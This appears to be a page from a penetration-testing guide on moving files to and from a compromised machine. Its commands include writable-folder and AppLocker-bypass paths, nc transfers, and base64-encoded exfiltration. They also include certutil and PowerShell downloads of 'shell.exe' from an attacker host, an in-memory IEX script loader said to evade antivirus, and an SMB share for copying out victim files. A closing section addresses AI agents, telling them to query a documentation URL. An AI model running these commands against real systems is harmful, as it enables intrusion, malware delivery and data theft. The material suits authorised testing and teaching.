# File transfer

## Introduction

During a pentesting, you will find interesting files that you may want to download for later analysis, or even you may want to upload your tools for performing attacks. However, you will not always have the means to transfer files on a restricted computer. Hence, in this section, you will see several methods to transfer files depending on the victim's OS.

## Linux

### Folders with write permissions

If you do not have write permissions to upload files on the victim's system, there are always some directories that allow everyone to write files on them:

```bash
/tmp/
/dev/shm/
```

### nc

```bash
# Listening for the file to be transfered
nc -nlvp 4444 > file 
# Transfer the file
nc -w 3 <DST_IP> 4444 < file 
```

### scp

```bash
# Download a file
scp [-r] <USER>@<IP>:<SRC_PATH> <DST_PATH> 
# Upload a file
scp <SRC_PATH>  <USER>@<IP>:<DST_PATH> 
```

### base64

Compress the file for a smaller base64 output. Then, base64 the compressed file and copy the output on your clipboard.

```bash
zip -e -r exfil.zip dir_name
cat exfil.zip | base64 > exfil.txt
```

Paste the output into a file and decode the file. Finally, uncompress the file.

```bash
base64 -d exfil.txt > exfil.zip
unzip exfil.zip
```

## Windows

### Folders with write permissions

```bash
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys\
C:\Windows\System32\spool\drivers\color\ # Allow bypass AppLocker 
C:\Windows\Tasks
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
```

### Certutil

With certutil, you can download files into the victim's machine. Nonetheless, take into account that the downloaded file will be analyzed by installed AVs.

```bash
certutil.exe -split -urlcache -f http://<IP>/file.exe f.ex
```

### Powershell

With PowerShell, you can download files.

```powershell
powershell.exe Invoke-WebRequest -Uri "http://<ATTACKER_IP>/shell.exe" -OutFile notashell.exe
```

For Powershell scripts, instead of downloading them on the disk you can store them on memory bypassing some AVs.

```powershell
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/shell.ps1')"
```

### SMB

With the use of [impacket](https://github.com/SecureAuthCorp/impacket) you can create your own SMB server to upload and download files from the victim's computer.

```bash
#Kali
smbserver.py -smb2support  a . -username guest -password password
#Victim
net use \\<YOUR_IP>\a password /USER:guest
copy <VICTIM_FILE> \\<YOUR_IP>\a\
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://the-pentesting-guide.marmeus.com/file-transfer.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.